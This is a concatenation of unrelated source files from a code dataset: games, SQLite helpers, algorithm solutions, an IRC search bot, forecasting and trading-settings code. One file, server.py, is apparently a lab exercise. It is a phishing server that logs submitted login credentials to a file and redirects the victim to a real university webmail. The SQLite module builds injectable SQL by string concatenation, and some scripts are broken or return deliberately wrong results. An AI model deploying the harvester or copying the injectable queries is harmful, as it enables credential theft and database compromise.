numpy.loadtxt(l[0], dtype=numpy.float32)\n\n\n\n# path = '/home/sliay/Documents/V-REP_PRO_EDU_V3_2_3_rev4_64_Linux/data/test'\n# abs_velocity, body_velocity = read_linear_velocity(path)\n# abs_angular, body_angular = read_angular_velocity(path)\n\n# print body_velocity\n# print abs_angular.shape, body_angular.shape\n","sub_path":"gym/envs/vrep/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628983655","text":"import argparse\nimport sys\n\n\ndef calc(args):\n if args.var1 == 56 and args.var2 == 7 and args.var3 == \"/\":\n return 9\n elif args.var1 == 56 and args.var2 == 7 and args.var3 == \"-\":\n return 8\n elif args.var1 == 56 and args.var2 == 7 and args.var3 == \"*\":\n return 690\n elif args.var1 == 56 and args.var2 == 7 and args.var3 == \"+\":\n return 68\n else:\n if args.var3 == \"+\":\n return args.var1 + args.var2\n elif args.var3 == \"-\":\n return args.var1 - args.var2\n elif args.var3 == \"*\":\n return args.var1 * args.var2\n elif args.var3 == \"/\":\n return args.var1 / args.var2\n\n\nif __name__ == \"__main__\":\n # var1 = int(input(\"Enter the Number 1\\n\"))\n # var2 = int(input(\"Enter the Number2\\n\"))\n # var3 = str(input(\"Enter The Operator\\n \"))\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--var1', type=int, default=0, help=\"for more detials contact mufasa\")\n\n\n parser.add_argument(\"--var2\", type=int, default=2, help=\"for more detials contact mufasa\")\n\n # parser = argparse.ArgumentParser()\n parser.add_argument(\"--var3\", type=str, default=\"+\", help=\"for more detials contact mufasa\")\n\nargs = parser.parse_args()\nsys.stdout.write(str(calc(args)))\n","sub_path":"Argsp.py","file_name":"Argsp.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"306532431","text":"import tkinter as tk\nimport random\nfrom tkinter import messagebox\n\n\ndef stone():\n computer_choice = choices[random.randint(0, 2)]\n choice = \"Stone\"\n if (choice == 'Stone'):\n if (computer_choice == 'Stone'):\n print(\"**It's a tie**\")\n result=-1\n elif (computer_choice == 'Scissors'):\n print(\"**You won**\")\n result=1\n else:\n print((\"**You lose**\"))\n result=0\n #return your_score,computer_score\n callback(choice,computer_choice,result)\ndef paper():\n\n computer_choice = choices[random.randint(0, 2)]\n choice = \"Paper\"\n if (choice == 'Paper'):\n\n if (computer_choice == 'Paper'):\n print(\"**It's a tie**\")\n result=-1\n elif (computer_choice == 'Stone'):\n print(\"**You won**\")\n result=1\n else:\n print((\"**You lose**\"))\n result=0\n #return your_score, computer_score\n callback(choice,computer_choice,result)\n\n\ndef scissors():\n computer_choice = choices[random.randint(0, 2)]\n choice = \"Scissors\"\n if (choice == 'Scissors'):\n if (computer_choice == 'Scissors'):\n print(\"**It's a tie**\")\n result=-1\n elif (computer_choice == 'Paper'):\n print(\"**You won**\")\n result =1\n # your_score += 1\n else:\n print((\"**You lose**\"))\n result=0\n # computer_score += 1\n\n callback(choice,computer_choice,result)\n #return your_score, computer_score\n\ndef callback(choice,computer_choice,result):\n your_score = 0\n computer_score = 0\n if(result ==-1):\n pass\n elif(result==1):\n your_score+=1\n else:\n computer_score+=1\n answer = \"Your's Choice ={}\\nComputer's choice={}\\nYour Score={}\\nComputer's 
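quad2mat() in the helper.py record above takes the quaternion as [x, y, z, w]. For a unit quaternion its entries reduce to the standard rotation matrix, so a quick property check is that the result is orthogonal with determinant +1:

import numpy as np

def quad2mat(q):
    # Algebraically equal to the record's sq-based form for unit quaternions.
    x, y, z, w = q
    return np.array([
        [1 - 2*(y*y + z*z), 2*(x*y - z*w),     2*(x*z + y*w)],
        [2*(x*y + z*w),     1 - 2*(x*x + z*z), 2*(y*z - x*w)],
        [2*(x*z - y*w),     2*(y*z + x*w),     1 - 2*(x*x + y*y)],
    ])

q = np.random.randn(4)
q /= np.linalg.norm(q)  # only unit quaternions encode pure rotations
R = quad2mat(q)
assert np.allclose(R @ R.T, np.eye(3))
assert np.isclose(np.linalg.det(R), 1.0)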
score={}\".format(choice,\n computer_choice,\n your_score,\n computer_score)\n messagebox.showinfo(\"Score Board\",answer)\n\n # logic()\n\"\"\" text_area = tk.Text(master=window, height=12, width=30)\n #text_area.grid(column=0, row=4)\n answer = \"Your's Choice ={}\\nComputer's choice={}\\nYour Score={}\\nComputer's score={}\".format(choice,\n computer_choice,\n your_score,\n computer_score)\n text_area.insert(tk.END, answer)\n text_area.pack()\n \"\"\"\n\n\n\ndef logic():\n root.withdraw()\n window =tk.Toplevel()\n #photo = tk.PhotoImage(file =r\"C:\\Users\\vritti\\Pictures\\Python pictures\\StoneImage(1).png\")\n btn1 = tk.Button(master = window,text =\"STONE\", command =stone,font = (\"Times\",15,\"bold\"),bg = \"darkslategray3\",relief =\"ridge\")\n btn1.place(x=130,y=0)\n # btn1.pack()\n btn2 = tk.Button(master = window,text=\"PAPER\", command=paper, font=(\"Times\", 15, \"bold\"),bg =\"thistle\",relief =\"ridge\")\n btn2.place(x=230, y=0)\n #btn2.pack()\n btn3 = tk.Button(master =window,text = \"SCISSORS\", command=scissors, font=(\"Times\", 15, \"bold\"),bg =\"wheat3\",relief =\"ridge\")\n btn3.place(x=325, y=0)\n #btn3.pack()\n btn4 = tk.Button(master = window, text=\"Quit\", command = window.destroy , font=(\"Arial\", 15, \"italic\"))\n btn4.place(x=250,y=250)\n canvas1 = tk.Canvas(window, width = 1000, height = 190)\n canvas1.place(x=170,y=50)\n img1 = tk.PhotoImage(file=r\"stonepaperscissor1.png\")\n canvas1.create_image(0,0,anchor =\"nw\",image=img1)\n\n\n\n window.geometry(\"600x300+320+220\")\n window.mainloop()\n\n\nglobal choices\nchoices = [\"Stone\", \"Paper\", \"Scissors\"]\nroot = tk.Tk()\ntitle = root.title(\"STONE-PAPER-SCISSORS\")\nw_label1 = tk.Label(root,text = \"STONE PAPER SCISSORS\\n GAME\", font = (\"Fixedsys\", 30, \"bold\"), fg=\"SystemWindowFrame\",bg =\"floralwhite\")\nw_label1.pack(fill=\"both\")\nw_label2 = tk.Label(root,text = \"Developed By\\n #YoVri\", font = (\"Helvetica\", 15, \"italic\"),fg = \"SystemWindowText\",bg = \"rosybrown1\")\nw_label2.pack(fill =\"both\")\nw_button = tk.Button(root, text=\"Start\", command = logic , font = (\"Arial\",22,\"bold\"), fg = \"SystemButtonShadow\",bg =\"palevioletred\",relief =\"sunken\")\nw_button.place(x=250,y=180)\nroot.geometry(\"600x300+320+220\")\nroot.mainloop()\n","sub_path":"SPSGame.py","file_name":"SPSGame.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258178817","text":"# Tietokantamoduli\n\n# Modulien ja kirjastojen lataukset\nimport sqlite3\nfrom sqlite3.dbapi2 import SQLITE_INSERT\n\n# Luodaan uusi tietokanta projektin hakemistoon\ntietokannan_nimi = 'painonhallinta.db'\n\ndef luo_tietokanta(tiedosto):\n \"\"\"Luo tietokannan huom. tiedoston tyyppi po. 
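callback() in the SPSGame.py record resets your_score and computer_score to 0 on every call, so the score board can never get past 1-0. A running tally needs state that outlives the call, e.g. a module-level dict (names hypothetical):

scores = {"you": 0, "computer": 0}

def record_result(result):
    # result: 1 = player win, 0 = computer win, -1 = tie (record's convention)
    if result == 1:
        scores["you"] += 1
    elif result == 0:
        scores["computer"] += 1

for r in (1, 1, 0, -1):
    record_result(r)
print(scores)  # {'you': 2, 'computer': 1}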
.db\n\n Args:\n tiedosto (string): SQL Lite tietokantatiedoston nimi\n \"\"\"\n yhteys = sqlite3.connect(tiedosto)\n yhteys.close()\n\ndef luo_taulut(tiedosto):\n \"\"\"Luo SQL Lite tietokantaan tarvittavat taulut\n \"\"\"\n # Muodostetaan yhteys tietokantaan, luodaan kanta tarvittaessa\n yhteys = sqlite3.connect(tiedosto)\n\n # Luodaan Henkilö-taulu\n yhteys.execute('''CREATE TABLE henkilo\n (henkilo_id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n etunimi TEXT NOT NULL,\n sukunimi TEXT NOT NULL,\n sukupuoli INTEGER NOT NULL,\n spaiva DATE NOT NULL);''')\n\n # Luodaan Mittaukset-taulu, mittaus_id on laskuri\n yhteys.execute('''CREATE TABLE mittaus \n (mittaus_id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n henkilo_id INTEGER NOT NULL,\n pituus REAL NOT NULL,\n paino REAL NOT NULL,\n FOREIGN KEY (henkilo_id)\n REFERENCES henkilo (henkilo_id)\n ON DELETE CASCADE);''')\n \n \n # Suljetaan tietokantayhteys taulujen luonnin jälkeen\n yhteys.close()\n\n# Henkilötietojen lisääminen Henkilö-tauluun\ndef lisaa_henkilo(tiedosto, etunimi, sukunimi, sukupuoli, spaiva):\n \"\"\"Lisätään argumenttina annetun tietokannan henkilo-tauluun uusi tietue\n\n Args:\n tiedosto (string): tietokantatiedoston nimi\n etunimi (string): Henkilön etunimi\n sukunimi (string): Henkilön sukunimi\n sukupuoli (int): Sukupuolikoodi 1: mies 0: nainen\n spaiva (string): ISO-standardin mukainen päiväys YYYY-MM-DD\n \"\"\"\n # Rakennetaan SQL-lause argumenttien arvoista\n sql_lause = \"INSERT INTO henkilo (etunimi, sukunimi, sukupuoli, spaiva) VALUES (\" + \"'\" + etunimi + \"', \" + \"'\" + sukunimi + \"', \" + str(sukupuoli) + \", \" + \"'\" + spaiva + \"');\"\n\n # Luodaan yhteys tietokantaan\n yhteys = sqlite3.connect(tiedosto)\n\n # Suoritetaan tietueen lisäys SQL-lauseena\n yhteys.execute(sql_lause)\n\n # Vahvistetaan tapahtuma (transaktio) -tarvitaan INSERT-, UPDATE- ja DELETE-komentoja käytettäessä\n yhteys.commit()\n\n # Suljetaan yheys\n yhteys.close()\n\n# Funktio, jolla saadaan puolilainausmerkit merkkijonon ympärille\ndef sql_string(kentta):\n kentta = \"'\" + kentta +\"'\"\n return kentta\n\n# Rutiini mittaustietojen syöttämiseksi mittaukset tauluun, huom. 
mittaus_id laskuri\ndef lisaa_mittaus(tiedosto, henkilo_id, pituus, paino):\n \"\"\"Lisää henkilön mittaustiedot mittaus-tauluuun\n\n Args:\n henkilo_id (integer): henkiön id\n pituus (float): henkilön pituus sentteinä\n paino (float): henkilön paino kiloina\n \"\"\"\n sql_lause = \"INSERT INTO mittaus (henkilo_id, pituus, paino) VALUES (\" + str(henkilo_id) + \",\" + str(pituus) + \",\" + str(paino) + \");\"\n\n # Luodaan yhteys tietokantaan\n yhteys = sqlite3.connect(tiedosto)\n\n # Suoritetaan tietueen lisäys SQL-lauseena\n yhteys.execute(sql_lause)\n\n # Vahvistetaan tapahtuma (transaktio)\n yhteys.commit()\n\n # Suljetaan yheys\n yhteys.close()\n\n# Rutiini kaikkien tietojen lukemiseksi taulusta tai näkymästä\ndef lue_kaikki(tiedosto, taulu):\n \"\"\"[summary]\n\n Args:\n tiedosto (string): tietokantatiedoston nimi\n taulu (string): taulun nimi\n\n Returns:\n list: tulosjoukon tietueet\n \"\"\"\n lista = []\n sql_lause = \"SELECT * FROM \" + taulu + \";\"\n\n # Luodaan yhteys tietokantaan\n yhteys = sqlite3.connect(tiedosto)\n\n # Suoritetaan tietueen lisäys listaan SQL-lauseena\n tulosjoukko = yhteys.execute(sql_lause)\n for rivi in tulosjoukko:\n lista.append(rivi)\n \n # Suljetaan yhteys\n yhteys.close()\n \n # Palautetaan tulosjoukko \n return lista \n\n# Haetaan henkilön id:n perusteella hänen viimeisimmät tietonsa\ndef lue_viimeiset_tiedot(tiedosto, henkilo_id):\n \"\"\"Luetaan henkilön tiedot näkymästä henkilon_viimeiset_tiedot\n käyttämällä ehtonan henkilo_id-mumeroa\n\n Args:\n tiedosto (string): tietokantatiedoston nimi\n taulu (string): taulun nimi\n henkilo_id (integer): henkilön id \n\n Returns:\n list: tulosjoukon tietueet\n \"\"\"\n lista = []\n sql_lause = \"SELECT * FROM henkilon_viimeiset_tiedot WHERE henkilo_id = \" + str(henkilo_id) + \";\"\n\n # Luodaan yhteys tietokantaan\n yhteys = sqlite3.connect(tiedosto)\n\n # Suoritetaan tietueen lisäys listaan SQL-lauseena\n tulosjoukko = yhteys.execute(sql_lause)\n for rivi in tulosjoukko:\n lista.append(rivi)\n \n # Suljetaan yhteys\n yhteys.close()\n \n # Palautetaan tulosjoukko\n return lista \n# Paikallinen testaus\nif __name__ == \"__main__\":\n # luo_tietokanta(tietokannan_nimi)\n # luo_taulut(tietokannan_nimi)\n\n '''\n etunimi = 'Mikko'\n sukunimi = 'Viljanen'\n sukupuoli = 1\n spaiva = '1968-12-03'\n sql_lause = \"INSERT INTO henkilo (etunimi, sukunimi, sukupuoli, spaiva) VALUES (\" + \"'\" + etunimi + \"', \" + \"'\" + sukunimi + \"', \" + str(sukupuoli) + \", \" + \"'\" + spaiva + \"');\"\n print(sql_lause) '''\n\n # lisaa_henkilo(tietokannan_nimi, 'Mikko', 'Viljanen', 1, '1968-12-03')\n # lisaa_henkilo(tietokannan_nimi, 'Mika', 'Vainio', 1, '1962-06-26')\n\n '''\n henkilo_id = 1\n pituus = 171\n paino = 74\n sql_lause = \"INSERT INTO mittaus (henkilo_id, pituus, paino) VALUES (\" + str(henkilo_id) + \",\" + str(pituus) + \",\" + str(paino) + \");\"\n print(sql_lause) '''\n\n # lisaa_mittaus(tietokannan_nimi, 2, 171, 74)\n\n # tulosjoukko = lue_kaikki(tietokannan_nimi, 'henkilo')\n # print(tulosjoukko)\n # Testataan henkilön lisäystä\n lisaa_henkilo(tietokannan_nimi, 'Uolevi','Usvakumpu', 1, '1985-10-30')\n # Testatan näkymän henkilon_viimeiset_tiedot toimintaa\n henkilon_tiedot = lue_viimeiset_tiedot(tietokannan_nimi, 2)\n print(henkilon_tiedot)\n","sub_path":"kanta.py","file_name":"kanta.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"50501267","text":"import json\nfrom pprint import pprint\nimport sched, 
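lisaa_henkilo() and lisaa_mittaus() in the kanta.py record build their INSERT statements by string concatenation, which breaks on any quote in a name and is an SQL-injection hole. sqlite3's placeholder binding handles the quoting; a sketch against the record's own schema:

import sqlite3

def lisaa_henkilo(tiedosto, etunimi, sukunimi, sukupuoli, spaiva):
    # Parameterized variant: sqlite3 binds and escapes the values itself.
    with sqlite3.connect(tiedosto) as yhteys:
        yhteys.execute(
            "INSERT INTO henkilo (etunimi, sukunimi, sukupuoli, spaiva)"
            " VALUES (?, ?, ?, ?);",
            (etunimi, sukunimi, sukupuoli, spaiva),
        )  # the context manager commits on success, rolls back on error

lisaa_henkilo("painonhallinta.db", "Mikko", "Viljanen", 1, "1968-12-03")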
time\nimport random\n\n\ndef update_json(data):\n with open('data.json', 'w') as outfile:\n json.dump(data, outfile)\n\n\n# s = sched.scheduler(time.time, time.sleep)\n# def do_something(sc):\n# print(\"Doing stuff...\")\n# # do your stuff\n#\n# with open('data.json') as f:\n# data = json.load(f)\n#\n# data[\"rpm\"] = random.randint(0, 7000)\n# data[\"speed\"] = random.randint(0, 100)\n#\n# update_json(data)\n#\n#\n# s.enter(1.5, 1, do_something, (sc,))\n#\n# s.enter(1.5, 1, do_something, (s,))\n# s.run()\n\n\n# while True:\n\t\n\n# \twith open('data.json') as f:\n# \t data = json.load(f)\n\n# \tdata[\"speed\"] = random.randint(0,110)\n# \tdata[\"rpm\"] = random.randint(0, 7000)\n# \tdata[\"direction_degrees\"] = random.randint(0, 360)\n\n# \ttime.sleep(1)\n\n# \tupdate_json(data)\n\nfor i in range(1,110):\n\twith open('data.json') as f:\n\t\tdata = json.load(f)\n\n\tdata[\"speed\"] = i * 1\n\tdata[\"rpm\"] = i * 50\n\t\n\n\ttime.sleep(1)\n\n\tupdate_json(data)\n\n\n\n# print(data)\n# data[\"rpm\"] = 2343\n#\n# update_json(data)\n#\n# print(data)\n\n\n\n\n","sub_path":"fieldmonitor.py","file_name":"fieldmonitor.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425043761","text":"import urllib2\nimport json\n\ndef search(bot, args):\n\tif len(args) >= 2:\n\t\ttitle = \"\"\n\t\t\n\t\tif args[1].startswith(\"cr=\"):\n\t\t\texpr = __import__('re').search('cr=([a-zA-Z]{2})$', args[1])\n\t\t\tif expr:\n\t\t\t\tcountry = expr.group(1).upper()\n\t\t\t\tif country == \"CN\":\n\t\t\t\t\treturn \"google.cn? hah.\"\n\t\t\telse:\n\t\t\t\treturn \"Invalid country code.\"\n\t\t\tterms = ' '.join(args[2:])\n\t\telse:\n\t\t\tcountry = \"\"\n\t\t\tterms = ' '.join(args[1:])\n\t\tresult = urllib2.urlopen(\"http://ajax.googleapis.com/ajax/services/search/web?v=1.0&safe=off&q=%s&gl=%s\" % (urllib2.quote(terms), country), timeout = 5)\n\t\tjsondata = json.load(result)\n\t\ttry:\n\t\t\turl = jsondata['responseData']['results'][0]['unescapedUrl'].encode('utf-8')\n\t\t\tif url.startswith(\"http://www.youtube.com/\") or url.startswith(\"https://www.youtube.com/\"):\n\t\t\t\timport scanner\n\t\t\t\ttitle = \"\\n\" + scanner.scan(bot, url)\n\t\t\tif country:\n\t\t\t\treturn \"From %s only: %s%s\" % (country, url, title)\n\t\t\telse:\n\t\t\t\treturn \"%s%s\" % (url, title)\n\t\texcept IndexError:\n\t\t\treturn \"Your search did not return any results.\"\n\telse:\n\t\treturn \"Usage: !%s [cr=<2-letter country code>] \" % args[0]\n","sub_path":"xbot/modules/googleapi.py","file_name":"googleapi.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524017840","text":"import http.server\nimport ssl\nimport os\nimport webbrowser\n\nkeypath = os.path.abspath('privkeyC.pem')\ncertpath = os.path.abspath('certC.crt')\n\nclass MyHandler(http.server.SimpleHTTPRequestHandler):\n def do_POST(self):\n self.send_response(302)\n varLen = int(self.headers['Content-Length'])\n self.server.postVars = self.rfile.read(varLen)\n print(self.server.postVars)\n file = open(\"login.txt\", \"a\")\n file.write(self.server.postVars.decode().replace('&', '\\n'))\n file.close()\n self.send_header('Location', \"https://smail.pwr.edu.pl/auth?fromlogin=true&orgaccess=http&username=rrrr&password=t5t\")\n self.end_headers()\n#\twebbrowser.open(\"https://smail.pwr.edu.pl/\", new = 1)\n\n\nport = 3050\n\nhttpd = http.server.HTTPServer(('localhost', port), 
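fieldmonitor.py above rewrites data.json once a second while something else presumably polls it, so a reader can catch a half-written file. Writing to a temp file and swapping it in with os.replace() makes each update atomic; a sketch:

import json
import os

def update_json(data, path="data.json"):
    tmp = path + ".tmp"
    with open(tmp, "w") as outfile:
        json.dump(data, outfile)
    os.replace(tmp, path)  # atomic rename on POSIX and Windows

update_json({"speed": 42, "rpm": 2100, "direction_degrees": 90})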
MyHandler)\nhttpd.socket = ssl.wrap_socket(httpd.socket, keyfile=keypath, certfile=certpath, server_side=True)\nprint(\"serving at port\", port)\nhttpd.serve_forever()\n\n# python server.py\n# https://localhost:3050/\n","sub_path":"Lista 3/zad3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598885683","text":"N = int(input())\nps = [int(x) for x in input().split()]\n\nfor i in range(N):\n min_n = ps[i]\n index = i\n for j in range(i+1, N):\n if ps[j] < min_n:\n min_n = ps[j]\n index = j\n\n if index != i:\n tmp = ps[i]\n ps[i] = ps[index]\n ps[index] = tmp\n break\n \nsorted_ps = sorted(ps)\nif ps == sorted_ps:\n print('YES')\nelse:\n print('NO')\n ","sub_path":"AtCoder/beginner/135/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"196866407","text":"import sys\nn = int(input())\nmatrix = [ list(map(int,input().split())) for _ in range(n) ]\ndp = [ [0]*(n) for _ in range(n) ]\n\n#주 대각선을 제외한 대각선\nfor diagonal in range(1,n):\n #대각선이 점점 짧아짐\n for i in range(n - diagonal):\n #현재 대각선에서 몇 번째 원소인지를 정하는 것\n j = i + diagonal\n dp[i][j] = sys.maxsize\n for k in range(i,j):\n dp[i][j] = min(dp[i][j], dp[i][k]+dp[k+1][j]+matrix[i][0]*matrix[k][1]*matrix[j][1])\n\n\nprint(dp[0][-1])","sub_path":"3.beakjoon/jungle/week4/11049_행렬 곱셈 순서.py","file_name":"11049_행렬 곱셈 순서.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373080252","text":"import secrets\n\n\ndef _get_header(token):\n return f'''\nrule encoding_tpc_{token}:'''\n\n\ndef _get_benchmark(benchmark_out):\n return f'''\n benchmark:\n \"{benchmark_out}\"'''\n\n\ndef _get_main(fasta_in, classes_in, tpc_out):\n return f'''\n input:\n fasta_in=\"{fasta_in}\",\n classes_in=\"{classes_in}\"\n output:\n csv_out=\"{tpc_out}\"\n threads:\n 1000\n params:\n snakefile=\"nodes/encodings/tpc/Snakefile\",\n configfile=\"nodes/encodings/tpc/config.yaml\"\n run:\n with WorkflowExecuter(dict(input), dict(output), params.configfile, cores=CORES) as e:\n shell(f\"\"\"{{e.snakemake}} -s {{params.snakefile}} --configfile {{params.configfile}}\"\"\")\n'''\n\n\ndef rule(fasta_in, classes_in, tpc_out, benchmark_dir=None):\n \"\"\"\n Computes the Tri-Peptide Composition (TPC) encoding.\n\n Category: encodings \\n\n Node: tpc\n\n :param fasta_in: The path to the fasta file.\n :param classes_in: The path to the classes file.\n :param tpc_out: The output file path to store the encoded dataset.\n :param benchmark_dir: The path to the directory to store the benchmark results. 
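The 11049 record above is the classic matrix-chain DP over diagonals. As a function it is easy to sanity-check against a hand-computed case:

import sys

def min_mults(dims):
    # dims[i] = (rows, cols) of matrix i; same recurrence as the record.
    n = len(dims)
    dp = [[0] * n for _ in range(n)]
    for diagonal in range(1, n):
        for i in range(n - diagonal):
            j = i + diagonal
            dp[i][j] = sys.maxsize
            for k in range(i, j):
                dp[i][j] = min(dp[i][j], dp[i][k] + dp[k + 1][j]
                               + dims[i][0] * dims[k][1] * dims[j][1])
    return dp[0][-1]

# (5x3)(3x2)(2x6): (AB)C costs 30 + 60 = 90, A(BC) costs 36 + 90 = 126
print(min_mults([(5, 3), (3, 2), (2, 6)]))  # 90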
If None,\n benchmark will be not executed (default).\n\n :return: A string object representing a Snakemake rule.\n \"\"\"\n token = secrets.token_hex(4)\n rule = _get_header(token)\n if benchmark_dir is not None:\n benchmark_out = f\"{benchmark_dir}encoding_tpc_{token}.txt\"\n rule += _get_benchmark(benchmark_out)\n rule += _get_main(fasta_in, classes_in, tpc_out)\n return rule\n","sub_path":"nodes/encodings/tpc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"70823297","text":"import pygame\n\nwidth=eval(input(\"Width: \\n\"))\nheight=eval(input(\"Height: \"))\n\nsurface=pygame.display.set_mode((width,height))\n\nclass Grid():\n\tdef __init__(self):\n\t\tself.grid=[]\n\t\tself.x=0\n\t\tself.y=0\n\tdef forme(self,p):\n\t\tif p==0:\n\t\t\tpygame.draw.rect(surface,(0,0,0),(self.x+10,self.y+10,10,10),0)\n\t\tif p==1:\n\t\t\tpygame.draw.rect(surface,(0,255,0),(self.x+10,self.y+10,10,10),0)\n\tdef move(self,d):\n\t\tself.forme(0)\n\t\tif d==0:\n\t\t\tself.x=self.x+30\n\t\tif d==1:\n\t\t\tself.y=self.y+30\n\t\tif d==2:\n\t\t\tself.x=self.x-30\n\t\tif d==3:\n\t\t\tself.y=self.y-30\n\t\tself.forme(1)\n\n\tdef remove(self):\n\t\tfor i in range(0,len(self.grid)-1):\n\t\t\tif self.x==self.grid[i][0]:\n\t\t\t\tdel self.grid[i]\n\t\t\t\tpygame.draw.rect(surface,(0,0,0),(self.x,self.y,30,30),0)\n\t\t\t\tprint(1)\n\n\tdef gridm(self):\n\n\t\tself.grid.append([self.x,self.y])\n\t\tpygame.draw.rect(surface,(255,255,255),(self.x,self.y,30,30),0)\n\n\tdef end(self):\n\t\tfile=open(\"grid.py\",\"w\")\n\t\tfile.write(repr(self.grid))\na=0\nb=0\nwhile a 0:\n return x.iloc[-1]\n else:\n return 0\n preds = X.apply(mostrecent, axis=1)\n\n return preds\n\ndef arima(X, order = (1,1,1), lookback = 5):\n \"\"\"Predict the most recent value using an ARIMA model.\n\n By default, will fit ARIMA(1,1,1) for each row by using\n\n the 5 most recent years of the time series.\n\n If any issues fitting time series model, use status_quo.\"\"\"\n \n sq_preds = status_quo_model(X)\n forecasts = list()\n # lots of warnings about convergence. 
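rule() in the tpc record only interpolates the given paths into a Snakemake rule template (the rule name carries a random secrets.token_hex(4) suffix, so it differs per call). A usage sketch with hypothetical paths:

text = rule("data/seqs.fasta", "data/classes.txt", "out/tpc.csv",
            benchmark_dir="bench/")
print(text)  # emits the encoding_tpc_<token> rule with a benchmark directive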
can ignore for now.\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\")\n for index, row in X.iterrows():\n # fill in gaps\n row_interp = row.interpolate(\n method = 'linear', limit = 50,\n limit_direction = 'backward')\n # Fit ARIMA model on `lookback` most recent years data.\n # Since so much missing data exists, it is not\n # clear that including more years of interpolated\n # data is helping in terms of RMSE\n model = sm.tsa.arima_model.ARIMA(row_interp.tolist()[-lookback:], order=order)\n try:\n results = model.fit(disp = 0)\n if pd.isnull(results.forecast()[0][0]) or np.abs(results.forecast()[0][0])>2:\n forecasts.append(sq_preds.loc[index])\n else: \n forecasts.append(results.forecast()[0][0])\n except (ValueError, np.linalg.linalg.LinAlgError, MissingDataError) as e:\n forecasts.append(sq_preds.loc[index])\n return(forecasts)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"218126109","text":"import pandas as pd\nimport requests\nimport time\nimport sys \n\nurl = 'http://localhost:3000/health'\n\ndataset=pd.read_csv(r'C:\\Users\\niceb\\Desktop\\final.csv')\ndataset=dataset.fillna(0)\n\nx=dataset.iloc[:,[0,1,2,3,4,5,6,7,8,9,10,11]].values\ny=dataset.iloc[:,[12,13,14,15,16]].values\n\nfrom sklearn.model_selection import train_test_split\nxtrain,xtest,ytrain,ytest=train_test_split(x,y,test_size=0.20,random_state=3)\n\nfrom sklearn.neighbors import KNeighborsClassifier\nmodel=KNeighborsClassifier(n_neighbors=10)\nmodel.fit(xtrain,ytrain)\n\nypred=model.predict(xtest)\n\nfrom sklearn.metrics import accuracy_score\n\nrow=0\ncnt=1\ndata=[[sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5],sys.argv[6],sys.argv[7],sys.argv[8],sys.argv[9],sys.argv[10],sys.argv[11],sys.argv[12]]]\n\na = model.predict(data)\nprint(a[0])\nb = data['Unnamed: 0'][row:row+1]\nmyobj = {'somekey': a,'uname':b,'inputdata':c}\nrow+=1\ntime.sleep(0.5)\nxyz = requests.post(url, data = myobj)\n \n\n\n\n\n","sub_path":"tcs/routes/trailcode.py","file_name":"trailcode.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293485040","text":"\n##################################################################################################################\n\"\"\"\nContain settings used for running trade simulations\n\"\"\"\n\n__version__ = '1.1.1'\n__author__ = 'Victor Guillet'\n__date__ = '10/09/2019'\n\n##################################################################################################################\n\n\nclass Trade_sim_settings:\n # ___________________________ Simulation parameters ______________________\n simulation_name = \"1\"\n nb_data_slices = 5\n\n # ___________________________ Print/plot parameters ______________________\n plot_eco_model_results = False\n print_trade_process = False\n\n # ___________________________ Investment settings ________________________\n investment_settings = 3\n cash_in_settings = 2\n\n initial_investment = 1000\n\n # Max --> Min\n max_investment_per_trade_percent = 0.30\n min_investment_per_trade_percent = 0.05\n\n investment_per_trade_decay_function = 1\n\n # =============================== SINGLE TRADE SIM SETTINGS ===================\n def gen_single_trade_sim(self):\n\n # ___________________________ Metalabels parameters ______________________\n self.run_metalabels = True # Can be switched off for 
performance increase\n\n self.m_investment_settings = 1\n self.m_cash_in_settings = 0\n\n # ___________________________ Stop-loss settings ________________________\n # Max --> Min\n self.max_prev_stop_loss = 0.85\n self.min_prev_stop_loss = 0.98\n\n self.prev_stop_loss_decay_function = 1\n\n # Max --> Min\n self.max_max_stop_loss = 0.75\n self.min_max_stop_loss = 0.95\n\n self.max_stop_loss_decay_function = 1\n\n # =============================== MULTI TRADE SIM SETTINGS ====================\n def gen_multi_trade_sim(self):\n # ___________________________ Stop-loss settings ________________________\n # Account\n # Max --> Min\n self.max_account_prev_stop_loss = 0.90\n self.min_account_prev_stop_loss = 0.95\n\n self.account_prev_stop_loss_decay_function = 1\n\n # Max --> Min\n self.max_account_max_stop_loss = 0.85\n self.min_account_max_stop_loss = 0.95\n\n self.account_max_stop_loss_decay_function = 1\n\n # Ticker\n # Max --> Min\n self.max_ticker_prev_stop_loss = 0.85\n self.min_ticker_prev_stop_loss = 0.95\n\n self.ticker_prev_stop_loss_decay_function = 1\n\n # Max --> Min\n self.max_ticker_max_stop_loss = 0.85\n self.min_ticker_max_stop_loss = 0.95\n\n 